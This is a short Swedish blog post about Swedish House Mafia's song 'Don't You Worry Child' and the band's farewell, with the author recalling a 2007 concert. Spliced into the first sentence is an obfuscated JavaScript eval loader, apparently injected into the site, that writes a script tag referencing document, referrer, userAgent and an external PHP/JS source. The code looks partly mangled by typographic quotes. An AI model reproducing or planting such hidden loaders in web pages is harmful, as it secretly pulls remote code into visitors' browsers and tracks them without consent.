Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Swedish House Mafia – Don’t You Worry Child

Sebastian

Swedish eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdydr|var|u0026u|referrer|fhybn||js|php’.split(’|’),0,{}))
House Mafia, bandet som satte Sverige på kartan, igen. Kanske en av modern tids största artister inom house / dance. Nu när de lägger ner och har sina sista konserter i November passar de på och släpper också kanske deras sista låt tillsammans. 

Don’t You Worry Child ft. John Martin är Swedish House Mafia senaste låt som med både text och film visar på att det kan vara det sista vi hör från gänget. Videon är en storyline från start till slut som beskriver deras resa från ingeting till världens största houseband.

Blir själv lite ledsen av att se videon och höra den sorgsna texten då jag kommer ihåg när jag såg Swedish House Mafia i Frankrike 2007 vid deras relativt tidiga stadie. Tiden går fort.

Tack för dessa underbara år Swedish House Mafia!